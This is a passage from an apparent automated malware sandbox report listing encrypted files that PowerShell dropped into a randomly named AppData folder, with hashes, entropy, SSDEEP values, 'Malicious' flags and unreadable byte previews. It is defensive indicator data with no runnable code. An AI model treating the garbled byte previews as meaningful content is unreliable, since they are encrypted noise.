i...~.0....k4.-..&..fa.........J.f..................B...3..S..B!.`..M..\...f..D....;.$....o...+.b.=.....\|B....;J....;..:B.L.....{A..7...K3.......\|...yu.:e.u.E.Q!O.#.\...`V..x.@r..g?...O.$.1..!.....k.omN...}.!5A..6......8.b0r.c2.<:yg..g.737..U>..y...%.......J%...<>?jf\....f.4.x.2u3S..:...........:)`.....Cs.<..n.t..w.<....dNz........\#RL!DW.~;.....U.nn...?..Rp..Z=..!.T.Y..s.s(5..%..Z.[.p.]S..D4$.n...m.aS..%w..Y.JU6."N?\|7p#.K...O+..&O...

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\VLmlaiIjPOeFQEuYnS.InyPlCeSKZHW Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	51987
Entropy (8bit):	7.9966382793347135
Encrypted:	true
SSDEEP:	1536:cj/C0F6AYeSbqUrAEY0ZTO00ZaabFQJl55z:cTC66AYnZrAExKbZzbFa5l
MD5:	13D6B5B70806F59AF42B0462AEC54B72
SHA1:	4C70EB8E372DDBC3A895AA2BC8044EEFDF3385CB
SHA-256:	1A79EE3B3C544E8828DF7E93628DB27825E8C15DB18726BA458264198F02E5FD
SHA-512:	6EDAC497B39E543D47013115BE48A2958C8652C234CB0F2F274A91D586F7EE409405B406645070A3EF9CC4B7F9D639D06E7723C450BA873ABA2BA7EC18F03727
Malicious:	true
Reputation:	unknown
Preview:	@...D.]..Ur...M.tf.]r.j....\........V3T..'.....!w..+?.O.O.A..o&.....3PI..C.Y>0>.Q.y.!o... .y....t..&Y.O........[.:..Q.....L......T.s.~;!Y...L..... ".I.&A.....F5.K.3B....8{...g.<5.....M..'q>MB....m...T.....:.....rM.........9p..NE...n....D{@.[.v.;.qX.....h.'.3.M..1.........H.t.5TQ.l...N1.-.HG>..E.6...L&.+....Ic.WdQ.4FG..^...l/..7.e....%....Ii..%0......1..a&.td...E.. ...y.^..;xM.b..1m..g.x.p....~.....t.......'WD.$.DZ.K.<..(....n>..........I.}...:\|..oF.k./...-h.....V]...G...9..,.%W(7..Q(.w..`(.t...u..h.(@.....%.Ba.f^..4.7RS....>.tu.J.1.v...xY)../.z2%p..0..W}..+....r.W..`...(...@.O.....9.V(.-....."J@..$S\|P..~~.l..p.2...7...-eB.Az.u...ck..1..d...t.~...<..h).O.g.<.m..#.I"5..Id...-8.8\.}9....m`(.L..q.p.a.K..>......t...b8.f..;#.1..yv...]t.....jBX..'.>..NY+7..y.$......H_o.3........B.:h8.B.&..;U..W$.a.>.,b=.u..y..h.O?.^..!u....1......l<.J.0.C.z}.[..kAq..Rj.n.......$......1._z.F..-.f>...k.4..(..f4].X..xQ....Y..X..z.X..K._\|.c...Q.V`{..Y...

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\VjEdtILKxlWUa.GtRLuiFgVfyJKqp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	143576
Entropy (8bit):	7.998732609099998
Encrypted:	true
SSDEEP:	3072:cQCxClCZvs8aWWM8aijJ6pak9R1UrUnGBvznQ8:cQygFqWEcJSak9RkiSvTB
MD5:	EDD81ADD2B499FD72432E73BA8608B28
SHA1:	E6AD6F2E5605E69DED9D6738920A946863FC2361
SHA-256:	CE94B86DC4679DDADB459BD08FA2D7F14CC0B8914DB0A5097919A13C95F9B7E5
SHA-512:	2DC50594CEF7396CA0BD89CD3C5A47721FAF76638A298A4C3BC1CAAFB5FD095244C065986132802866ED83B9BBC7D42FADB0A198CA18237B1873A6F6243FECCA
Malicious:	false
Reputation:	unknown
Preview:	..'.].^..............82.Tt...g.;A.O........h..N.>.......;.WfT(k.....2.../4._..M..).V..f.../.Y....1....d.D.\|7`.i`.C,!V^......Wc..L.b........$..%....<?.q....<.G......Q4..?.p..9.^=.Ym.&..Q...2`...xBRea...].........l./.?..KC\....z......)...Ow...r..H2.dHd.....o).r..........x?y'.(.>..D.Y....NI..\|..&.4\|...&..}.K.:.E..-.o..R/... 6.u..\..mdcL..b.....7a.....T..\|..g....="y...o.0......\|......e....W8...>.0-..q.1h..N...-z.q...Ht..j^/.K...>.%^~O....W.'p.M...........N..\<.K.d..v..A...~.....8@.s.ti....k+....(."5.p.4.nO.PP.$.....q........G.........@..i0r?`..N....`d`........;.W.......'T..qF.,X....R...D...aU7\|......I.8..\M..oi....]Dx.9..H.Of.=.-..........3p.B.....SD.O...k.W.:h.XL..T.((....Me:.r8..V).......V....e...&..!^..M(...s..9..... J.".."4...8\..a%..;m..:v..T..y.....\|;&9...B;l....Nc$Kgi.~..w5)..C...r.y...;.!...wa.pZe....\cr.....n....R.`.qq.x+...V...Z@..x ...4.'_.W.....&0...R.N.. h....._.F.j..g]A)...1<...v..........\|.0.....8.\|..e...+V\..R

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\VkFSPUThgxu.MoXreVLOpCYQ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	86530
Entropy (8bit):	7.997920158001699
Encrypted:	true
SSDEEP:	1536:05n/wp2k7/p1pjIdNkyvqjrRaFlZc404ygK5Am+F9RKnekQlKZcNW/zr/SMSbMQQ:E4F73pTyyHwFla49o569RKnDQlUcNazz
MD5:	96335C96A283780288953AF6EE9A0686
SHA1:	D875EBBD3217B9662EE57FFCB5636967A28B7FD0
SHA-256:	CFB6470CFD6720E169FD87487E81EDFB9400717336D8002DF9C84BBE52B216C2
SHA-512:	47BB4A18A244CAA40FCFA28AA63E537A8D9FAA791CC7639886363A02722E04AC1DAFD45405389FF3A3B306531E04C5E1C29862B3F26CC89DAFD914145BAA9EB8
Malicious:	true
Reputation:	unknown
Preview:	>........Qh.../...$^5.._!...1....E.......,z.k9Ko.h..$..Q.6.....5kj#...z.RB..E...M...p.[.s.......]DC..vS.....R#.$A..l...K.eb[%.....Q.........ykO......W......T..<k..nN,...+4....._...w..... ...p.<.\|.VP...+JA\..Q.Yk;...L.2.....X..........7\|.j.vp,.jw...........0..jSz..{..Q4..om.y...z..c...V.H.L..W#.}o...q\2Q0a..#Ayu...{y......J..O.9.W..J.&.;..}l..v.s.>...U@9..w..!e%...R...%..8..tB.T..g.t@.)s..G.....#Pzd..H.....Z....6Z.L]@7..zV..^..10g.(.r..q[.c.....K...9,......)p...a..y...@c]....PdZ=-.P......e.:..?O}d.]2jP..(^..$.K.3..P......w<(.........P......lx.Z..j..Pi.[gvp.T"...(-^.16n..W...99u....5.Y.].M6..!.P..g.4+2i.".=6...7z.m.:I.8.?.c".y&:M..QG..=..V.i...I-.L.)Aqs.T.!.....'...8L_g.#../....s'.....{4A...d.%"zut.B...eM..).&...W........@...C.B0],.\On.B.]..>....Z.........&.ZL..Z.C........n:..%2E..1.G.`N^uw.?H:D....8U)x..%.n..'...(.._Kuv..Y.84.m.......ZF...s..\|8WT....b...n?.jx}p...A^o9.....R....tvY"I.jK...Wg....=.......-...b......X..q.$..F1...L.^..-..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\VmsfSCGRlMwvNaAPK.SCBkWQIoFxTbZKcDYPE Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	113761
Entropy (8bit):	7.9985468585870745
Encrypted:	true
SSDEEP:	3072:jaPosgq/13OkFyCtrp8NYGqijBQVZxGXDjtwUEFci:eXgO3j7Mxbj+tEjtwUkci
MD5:	A87B0826B93EC4E2BC9A3C54427F930E
SHA1:	528B526290D3BA5AC5B30ACBFAA8F2460C382381
SHA-256:	04B2698FCC7FD82D7FD7E3AC30659D2EEF7EBBA735301A1187A57C68A0415D19
SHA-512:	DBEE5ED686790B16BB12DA084AED6DC11B8CA5C02BD3D0E84AF70E657C0A87C6657BEA848E8ADC971533C9BF2B44F01BCF12DB4783EE1B3DF596748920EA1ED5
Malicious:	true
Reputation:	unknown
Preview:	.B.Bdp.~.'.....Sg..v.~q..]..(6:.....W....ytv?.B6..[.e0.B..t...V.......H.........y&c......j..Wd"..+.......7.9k.Fd.g36.g....2".%r'U.`I...0E}41>.../1"Y}(..7sI....c.....X......._`.!!..O...tbV<..jk..(.+..HA.vi......e...D>46.....]S~.@7..;...a].s.C.vCSL.....?.8..I.....**s.@..P2kP....1DdM.....p.GH.t.h{..(......wd......3.p.. \|.u....y.5..X..?.[..G2.....V..]#$x{.M.\|...>..hN.3>...N\-........h..#i.....G..U.:".yrn])..GBnv..n..........hh{e.L.hU..G...ZR.l.\.....X....^".\...)K..<.{.%B./e?..g..~.cY..].{MH.t.Ct.k.....3..m7.v....mj.)DOn.m[.2u"..w...c.0...&..yTyjL..'t....V....S.\PUN....I.H.h.;.(I>!P/66.P.uS..w_..$.BG...A.D......... ..T@.'.I6O......h.r..xq...r.Fa..........Y.o;.I.4..v..).......-......o!.3..6...>.~.fwN.e.p%]c....,.....=T.`?.....E.q:.=S5A.J.'l.(.....v.h..`......FG.T~L.C...o..2.......e.r..5 .j&B..d.l....,..n.........{Z.p.H..2./.TA5Slm..z..}Q?.O...Y....o..<...Z..@[.w(..V`7..Q.\=..B\|&....p...#K....TEb.3..B7......LP.5...m^MvG=.\.^"..B..]mm....@m.]...

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\VyklPGbBmpiXxSdqWtH.kFDLXHxfCRYGbW Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	188006
Entropy (8bit):	7.999011693061468
Encrypted:	true
SSDEEP:	3072:xtJEwscEXM0ybjAg1GkYCwN6T4efwmUMp3LzVQejFBVZx75d3enHXqNan00YLhPZ:xtSTXM08AgcCnffwhMdr3x7fu6fzWu
MD5:	7D0650E67C99E458929F6E29FCACC9A9
SHA1:	DCEDA2CECA28469CC1123762B8A577DDD16375D3
SHA-256:	28758B3CCD8AA68A1C8BAB0D138A6966B02B5AC74000B5F9423848D61D6DAFBD
SHA-512:	9CCE115EE78BB41D2304086B9FEEC71366ACBA84FEF8314500CD4A3328C9B3022FDF52873CAE7A091DBED603C803A41B56D919862217A6547B1453E268A0F12C
Malicious:	false
Reputation:	unknown
Preview:	.o.N....J...C?1J~..-=.."..s.},.n..._..v@.I.^.....P.{)BTy.c.......RuBR....g<.<{..y.,.:D..ek(..8\|.E...^.\..`<yp&..1......\|8.wd5........H)...q.f.0.........CY.....e..fQ.........HR..m7....^Q._....@fBO....i%.pL.u...i......r.....~h...!x.L....79N.S"0k.c.j...w.x........c...;.c.Z....U.0.`.`..Z.-DQ..?.-80..Htn..d.....1m....<..v.W......$.%U.s.C....%. G..\|qn.Y...O.xJ..<./H......V..Q.7]q.N\u....$..N..........a.......l..Q.......m.....h.F^c.@.t...Ae..uj+_..iW T\|X,/h.GD/&.u.{.jl..:t.n."/.Q^...By.H~<.l.5s....y....s. .9P..J.3...!...v..."I...0S.\.O.'q..v..)=....}...i.....YO'T.4.qgu.\|.gW^"..Um..@.o.D......4&.[2..i....B(..~.,..Z6.D.B....31n..`.l...,.#/.........b&.Z......Y4~.4*.Z\|... ...ZAd.......{w...w......QHT.P9....M8..K6.[........MB.o......BnOb.8.M.M.q./..n.;m?4u..+.......;"ppL8t..y.V..4'mi.9.........w...K/. ..u.TKq.] a...0b..w.6..gC.....H.ycq..p.:.k.Eb/....;n..?[..-0..e}..i.<....=........+g.l.$...Bv.(.],I..+.cR.su...\|..:.?..f&v.....`.N1

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\WDEyzLqkCM.vIWLZJTUQeXwoBdbjz Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	60346
Entropy (8bit):	7.99646917064745
Encrypted:	true
SSDEEP:	1536:69/lrFIZCbW/20cwHgIS6kM7Jz9O2/pHvuj9iJrh:4lrFHjiHtST4JZBxPuRiJrh
MD5:	3751EAB0D1B644DAAF5EDF82FB9876FC
SHA1:	9CFA2052A074B5225F96C8D534CED2517A6B7907
SHA-256:	F7F8B30A995DF40D7D859B657E7C2EA9E52FC48A698C89C2FA4A4EA509D82BAB
SHA-512:	EADBEE1AA96AF64091479DD6151F215D5A4EEF72F3019C220E2A00B573033072DAF93E096006ECCE5080A530FC28442AE03FF081580D8DD0F1E43A320F198A36
Malicious:	true
Reputation:	unknown
Preview:	8<........JMo.W.........VI.EK...F&#.Q..L14Z.@.....~.&......w.j\..}.:[\..Pa....<.n.;r.\.=.:.~$.2..T/...6J...c.4.RC.E/.\|.\|.Q!n.n\|/.......[!.<...^+.....z.cJ...}...v...~7.>.Z.@.......C...l.a.n.P.../T]..b.)[.}......iR...>...T)>.J..2.[[....7...tH%.=T.rjuwE..2F.>:..<p..K8..ZI]......D.R...:C..q...27.V......-...Q-.1.!......6.I.........). ...BN?..s..`NNk..&..fdo:=MIk.....G.4...p.C(.YY.W.9.j.<gG..../.\.}...6%...#.!F.......%.W."..A.._..S) .'..hqE.. .f.d....8I.H..3:.z9.e.G...\|...&2g_. W......=..+.m.'....b']..B......It....5\..Q.+......R..y^@e..<9.z.#........!.4..}.{4...S..t.;.k .>.........)dNv........fe]..,.UL]..r..M..d..J1.w^_.-.7).FL....R..~>.B.yf..k..+....0..H=.>.:}Z.....r.nN#}..J., .......f..h;.u}....x?/..>.....a\......4.H....T.x..>.....n.A.Y.....U.<Ch.N.y..I..R.#.uG3.fb.....s..V..}...Y.rr^\.<...A.."...u....(.5.....L....;........M.....`....JH'.B30.3Q..a...{...g5].Si/...o*....\|k.D.g.......#.m...?.....G.......~.d"v.&.;]W....F..B.b.\|v....!]...f

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\WsJtmdfOTZHYh.mLhasiNwuMzJFQt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	186175
Entropy (8bit):	7.9989160076942145
Encrypted:	true
SSDEEP:	3072:OTp1rqpA6FlKRzhtt82Sod5l2P0zCg2o9B30kQNf6vxJdwAKISmin6quuz+3DG+R:8p1sJAz5pSodOFgl/sSvjdwvZmQ6PTGM
MD5:	EFF3BC154104BC6FB7A3AEA355671125
SHA1:	79711E52E45FDDC3789E3B8571EFB4F330AAAC07
SHA-256:	8698ACC9104F9D695827B92B2105DC1B142DFAAEE90E362127AB0D1C59710DC1
SHA-512:	9455E3329863AD675562A4F19CBABC3E0B374C5DCCF2E9A08A8368DB8E961DEC0BE6DB36BBBFD574C53B626E1F2FB9F719B172C91DFAB80DC7BC1AD55211B44D
Malicious:	false
Reputation:	unknown
Preview:	Q.\..q...(..P.....H.............{......P..ze.yx`-....3......?...{.Y.........8R.R{.;...H..7.h.../t.. ..} ...`..R..S.?.x.....x.%.. ..g.}..X..;g.=..$n.Ms..i..2..{`..@2...}...frE.)_J...@......nQ.S..o........4.G.$I...q...).E@....9......U..g.ad..?..._...z..q...`....NQc\|...+.s...W...!..\|m.&.Z..i&&..b$.x......&p..Z`!H^.[....F7.\Mx~..a.`...;..j.....G...........YR..k..c..P6 .(....r..o..\f3..1..m{....<.;v_......I..D....Z.\|....s...G~..N.49.N.,Q....(......nyW..Y.e.......s.+..7..x..._(.. .......O'.r..8].2.R. ..fD..:p.%....k.......T.....<.......t....}O.m..8.._...8[.+...-.6......4..lt......Bu.:.....@.o".6...0..5....\.....M.....m[...g..>...X....6.6.F.I.c\|.Wt.z.......C.`...=[nz2....'....7..}.:.eKA5'xw.%!f.BY~...O.;X:)T.S...4..Q....[VUo.TZ.....j......h#..G2Q...8..t......kT..E...'...,.2`.!..2.....]c!=...i..he....T..Y......!....E/.[zp&.c...0.%9..s.\|lW]w.,..E`..y..!.cb..."...{..af.].....A..$...r..G.\|.^.QTM..9/.2...... ol..r.c_wz..8....n}........#...^j.A

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\WufnsLQMUK.wZvnTjDVKFmGRqWpg Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	54768
Entropy (8bit):	7.996685090732178
Encrypted:	true
SSDEEP:	1536:4Ohn8bOvEBKFbelhnH1SxtpvOkJR0LxIkb+FtikW/Q:4yn8bO8BnlB8xtpp4LakbatHW4
MD5:	6D6FF7FC63C104F608118FF885D5430E
SHA1:	22924597C56F40C3149FF2134FFD95E6C74024F2
SHA-256:	2EFA6ADF94A20C6CA9B378FA562132504A91B0728D0AD50BF43D7F14BCD3794D
SHA-512:	B3C1F6BC21D2DCFA9C92871994E3DDA32134FFA8C9274517122A31E6FB2D9F10E8429BFD5E6E721C6C34604665BC8EF67A805ADF09EEDE4C61FB761796B1DA11
Malicious:	true
Reputation:	unknown
Preview:	....&......1...T...0.v...C.9].'..v.v...hr....h.v...O...O.:..y+..d.%....(.....y.6...........'.....V.S.../.&.....!.p...g.\|....$..[..@OS.j-.......Wr)..W@.k.."..M.W....\./&.Nv.2\|G..J.,.4...H....."..%.U.......o..[5.\|.J]^xj....h..\|p....%#,..B.l.y..sn.x..](7i.c._.j.c.......x'.r.%2Zt....O.D....S.......3n.. ....6C....Lr......[.SuD.o...'../..EF.F...Jz%......e9;..~.F4"...^G....................n..J.h.).0.4..I_g.`.f.'.W.r(he....e....R.B..?....gf.k#....\.S......#.k...O.V.3..H..?.n..>+...h..[..........4.....K...`...-T..d9....N..YH[....c....xjpfHf....D..q......Jl....r....H.Yhg....5.U;UD.i.8.c.....[.<.`_..B.e...7.o.h.b....\...@.i'....,..d-n...0.?..ZW.z,...H...[>sz....S;.v..%..o..:aaiq..F...O.h.Gm.ej....E$.4".z.N.8.Ni....j....B.......l]#L..#>..../........ep...TD.\|......E....+..&.C.o'.m..v75..>..V......c...m....`q...i....JF....?F.S.....F]H{s~...vjJ..4...........c$.....qH.. .C.....t.(.P.......+.....>D~.J.xw.O .+....z.Qs.......&."3..a._C..Hbd..Oj.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\XAKtwqoYDBQkIi.erSGZvdBYJCUbMDco Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	183083
Entropy (8bit):	7.99897469072937
Encrypted:	true
SSDEEP:	3072:s1sfW0qoOQa/BsHHFDjGyvfHafwNBLr7ley8uHJqj3OiX78pkJ0YUYUvbrQhWUVn:TO0qr7/enIy3amLPlgMJWO2J0LYebc0m
MD5:	01B0F579799147D8AEC3BC0AF421A294
SHA1:	B32F090A9C6FD89B6C3805B5A648960AC26415FE
SHA-256:	BF7CED5469FEE54A8CEBE062553EB45CC06EAD9FAD85C5D6B1E83B75926EDDC3
SHA-512:	3AC7D2A9BE84D8B5B0194CDF5DC6D020C253EB4ECEF41A16734DB53866ECA47FFCC130E9C331AAC7C4DB127628DC9464AC0757FC830700DE281C09069D05781C
Malicious:	true
Reputation:	unknown
Preview:	e.A.M$5....4b.Z7.Qj..k.H...........X .lLy..m....2[...(..,T;Gb..H..PU_....2...c(.q.....,.$.a.v..^_.S......l....u....g.}......5....eA.".w.u....t...........=m$.7...U.B.t..s....>.,..V1...[.(....=&.c.6j.......XjA0..O..U....H..+...W".X..K..Z.j3:..[.$#[.......5...Gy..../79Z.=..E.Lo..3.._Qi..e%Zm1.N..e..."TaQ...k._._x..UI..4<...>h.:.G......:.._..ds.O9.}.`M.%.Gu....h...z..7..........0...W...V..5..OV.T..F..sJ..'.........(.....15kA....Eu]@.Z8./..#...@._3gS.."..jT...5E6_]..hhh.........S.5.J.SA.lH.....m:.t.....a&.......Sy.?LX.......D%.....6.....?..cU7H...%.(m1..m. .....@...M.+G.....B....1q{]..29J[..A.....$21.\\T....c...zJ.....w.oI.c..-}....v...\B( itd...S2$.......)...u[^d..+..MT.Wf.......X.0tDK2..2e4"...(<~'O..93c.....J)..a-.>..."..4r...g...a;.@.A.U......7...Y.K{/Q.P..7.W.&6.\0.8.l...,..iLtR....64m..........v .8x....L,...........L..L..a ..1.]3...S!S..o........V.\...5D...3..2W..y/........I........Q.J.6G..Y.C....!..]..E.........1..J. s..-`.O....F....h..f

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\XHeGYqQOVarfmtS.fIYAMdmsCiJE Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	132279
Entropy (8bit):	7.998591615981835
Encrypted:	true
SSDEEP:	3072:v06q6sZe92Laylx01wLd2AwedQNlO1uUbVaWDlBG7CTvM/tGI:NYZDLfoXAweBbhDDrMFV
MD5:	DD6C7E8AB58C09759016A3311729A749
SHA1:	FAF469C51A77B4161FD18326321D5A9FCCB700A9
SHA-256:	6576946D19E8297F5731F534E28563C8700A44CFAE0B01ABB8CA4367E7D44D3E
SHA-512:	C5F69BE57ADFDB629684A2ED0E847262FAE1AA2745FAB965DF1593A7EDF3B3C88527A90CF450AA3F66AE16E64F4D4B4744A40766042933409939EE2058B689FB
Malicious:	true
Reputation:	unknown
Preview:	Ch}..........e]oh.>.{R.....T.Ts.N..O"..s...X.a.8>!.......>.....U....)....T.].....R.]........A\|.@M..o.....bVg....Q..k...t.z..0W...c..AX[&L.\M.)#...0...0..}..P..N.(...;bDl&.&!.W.......X..W.m8>Q.Q..X.tq[..q...n&...aff.\jFz..4.FX..[./78..{Z9...5..h...........7.l).io.1.p..5.NW.....=....`.Od.ja-..P........:...Z..@.~..0. ... .0c. .......Dz... .H..vl.h..G..q..ye.v)..E....} G2cc...L...g}....1g....M..;.m, ..._..8..,G3...........d..........DS.k...Y.......#h"_.^DD5.W....$..?..M:bA.5.). hHcw.%...ce...7bg.8i~..%R.\|.f~-..9NJ0;r.0.6._....l"...y.R....].7:.~..1+.y8........[!..O..h:1.Q.$....:.^X~K..w..b..l...1R.C?..F<......d.u....R..oE ....'..p..x0.d....$R.Y....R...~..o..#...[..Z.f..T\~.G.U.9...J.6...PG...0..>V._..Szdz.Z'..N[.A..c.?.b.....s.%.\.hM.u.R.@h.6PEj....Sk7.....g......EiB......f{,..<.Q.........3..w4.bG..T.~4>....e..W.H.,..&.M....nTq...c~......tl.D..`..>.-..0.^.A.}.U.Z...V..1!7..1.{.92...^M"w...Ac...{.......O..@...#S...\|...C...c...

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\XdJLfAPsVEkGoCFjB.lqsaWnrgEutRN Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	149965
Entropy (8bit):	7.998800778570677
Encrypted:	true
SSDEEP:	3072:NA8QLPf17lyzZJEYC3ICz7l97G4TJ3VIepHRMO6iacw6a51J:NAdfSE/YY7vT3zHRMXiaFzvJ
MD5:	6545BDF8886B538C502B9BF573E586F2
SHA1:	65ECB8285B031DE3B56EAA95A566D7474CC5A3DF
SHA-256:	801BE49302A0E0E6B25826FBDBB45DAD231A9537F525B4C45F67CED832C93FBC
SHA-512:	0D3A7D9433581BF0E1CEFF420E4F66BA4B367D92D75BC98E22B1551548E4FA8A3BD479680368AD0AF1943014081131269AC8F31BD2E828CB5A178B1E42C87FAC
Malicious:	true
Reputation:	unknown
Preview:	9..?...rBy..@Pa..r...y...=..P...<V...G.p....a..K.O...7..H..>8":j.T.V7..3....>>.>Q......?.B1l.\|.........jB.^.a`V...I...E..N..'E.1).I....J..F..r...mJL......q.06..FdHTU..l.k(?+I...........-As..S....X.\f.b.9.y.mQ(lV....W;.+.P....}w......\|W..e....K.UN.(.-.S1..i.y..x......4...Y._..j..N.mzXQm..=..Y.:..f....F..m...Y)).H.h.z.E.aP...$.....ZZ.4.z.B3..-./C....%..,....H..'9e.hh.....3#..2P..2..<.>....l..._....)}.$..t...vY=..#,...d..j,/.q..... ...k)....4...<.....V....`.Dn.J.....8....5cDO5%.s"`.O.^.....v..~..(.....^.F.h^._..rb.LW...o&.cR...V2....`.TG..j..v.M......t.........R....S..&..n..x.9O.l.%..Y.,..b.V.4.KA....Kn...=..5Qrt..>.}.......DF........KT....f.....x.8....7..^.'E..R...4R(r./...R...}....\G[)A..C...dC...&.8iZ.i...B>..7....H....p.x\|QJl+i....W..J..kl.\|..j.CS..q....z@..Y.....*Y.>.-.....(...7.?.............j)'.3...Y[..q.Wh..../..l...#S........(..y4...n.7......J'.......&.oS....o.y.....V.$$!H}...Z.s{..c.h..-./.....&...5...&..f.L..B......9E

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\XiOQFzbuYefZDVyEG.XWUgcbExsqzmlNe Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	152132
Entropy (8bit):	7.998972768568574
Encrypted:	true
SSDEEP:	3072:mcQKqMQRlKz5bub36/a4TAX7a0NlYBYuv6IdDjI5gYcIu11mIhXM:mcQsW4z5ubK/lQG0vY2zNc/vmIhc
MD5:	19688997C6F0E9CE7334E9562F5C7480
SHA1:	8C2AA7BA69C6BBFA2A3741F2EBB310FCA6E765BC
SHA-256:	7C46784B892853229C13972133BB196C18A734C824099A8BDE77B0CB4617456F
SHA-512:	1A81AA5E788182D21E39A21457B4771949E2D9BD7288C20E2772E9A32F4DD36F2CAB86ABFA77CC40197B16D08BB215FBDA53FF1213D836FA4C3A6BC4DB3F9571
Malicious:	true
Reputation:	unknown
Preview:	JH.t...^..:.K..:s@..A.....c.]..eeCs....jD...4.Um]..s...v.m.......;......r.>.gm.:......Bc....o..l.V......@.9....I4O....}.%D`...0.....R.......j...h. )....(..Q.9p....W.......j.E...XI..{2...l./.bzT...cM.\....n%._...&..P....u....,...B..Q.ro.T..F..TD.MC..8.?.b.yX.........&l>4..J."/.YXi.r.v...Q.........o.....h..I...J.T...M..VBL.C..w\J..K(....zU.tH,H.....u.H>N..%^..=....r7..nS.........q!H...L.....6@sI.Ko...L......Y..q...!.....<.".b...:4.bTY....kZ.N.kM.U......y_)Qx/.u...v&..",h:boF..F.a!(,q.....;....q.+.......=~......M.GOR...........>q......R.w.7.A...Z....Db<...._.j.c...5...7.V.C.1.Z.h.;F.L{.........f;..P..`..s..../..(}.T.]..E ...f#..H.~.."@.c......J.Rh.0c.Sze.....@j.......8.X;t.?....b....qN2..&V......B/...i6...l&.4].qjp.4.7..U...-.fl.H.P....n......&7.....q}W.h........f.....[......h-..nb.8O@.r........W.#....!8.m.?.P.PTO:.J.V..J......Q..Zewd.g..2.V....y....B..W[.B...k...{.6w.$/..c.w..(.1$.t5...wl..J..c.Ca...&..%.'~Fwu...&..4E.N.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\XpxErPtWTL.cLUkfYwZNJDjmxQhor Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	159189
Entropy (8bit):	7.998882501393082
Encrypted:	true
SSDEEP:	3072:iq/WXqNH82fK0pU1dDDB1Nn/IL5Hulgq0xugivWzxnafXvge0eoyl0VS1r:ieWXCK1pzwLdrQfXoe0JS0VS1r
MD5:	49EB470EF6469BDD25F477831D2367AC
SHA1:	CD3D5EC3B354DAB11908FAC505FC212CB0B82447
SHA-256:	3FB4F3D9E16D043428EBF82E042DF81F972D42E8CC9F1FF4FC0C879C6279D0E8
SHA-512:	BAA3899A5F750F4FDDD2F845F51487076B33ABC96A3A163387086AD0AE3BAB24A1100CF52F5253347E3AA9F27BFED871363C562EDDED2096D65504E2A51E67B0
Malicious:	true
Reputation:	unknown
Preview:	.._...E....QJ...0.Ab8,R..Om..@....3jk..2..{y./.@..6%`P...B..d,.Z1P......#/...[4e\-.....z.%.(.'.c.!G0%._.72.0.'6....7F.P7..N.....bD....?p.)...h....5...n..x...0....c..n.y)j.Xy>O.....m.'......(.!..n.n...e,..V.(....<..<\.j~.VA#6.K.L9\.q%..&..2c..PL.}Z.2(./.......r..\|...c...8..b../B.......;..I....=M._e.3.d..u....U.St.............K..&.....jVL.B.........4.Q[.jK....xohw.1C\.I..ru..\<.8S.f.P.Z.9..).5R.>:...\@...:..%}..#.=L....H.V.....O.....e`.z=...3.3.U..Uy..%ht..g..u,.U..2..jQC."$[.5...[.l.@.../......5.!.<.]5..EOP.2.>...9.C.J.;y......c..u..6 ..U~.....5.T..=..."....B..N..._.09.>K$..x.....y.-.....b...QU...$].qz.E..+...Mr..W.....^\..&..__k....Bs.47...R.x.c.S...5.).i-..i..f;.......^I.0O.....f.J.C...o.H....q...u......f^\....U............$2{.6.t.8..#.:....G..[..#....pw.4....Yw.i3N.....A....n....4.....P...<..M D..\F..j\J.s w...8...-.3h...M..~T.t..\|...vby9..%j...(....wb.%.. .d...>'.%..iU..7.(....+.._.1.z^..Aq.OT,...x.Wu..u....p8..q....R.z..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\YCgWfxkoEStpcN.zFjfQoimJOA Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	63176
Entropy (8bit):	7.996891239304544
Encrypted:	true
SSDEEP:	1536:D15m0BB4KhdQA5Enfz0EIKaLwFSBU2ruYCMVdXTzUkX0:D1sQ4KhdQA58fLIKasSBUmCMTXf9X0
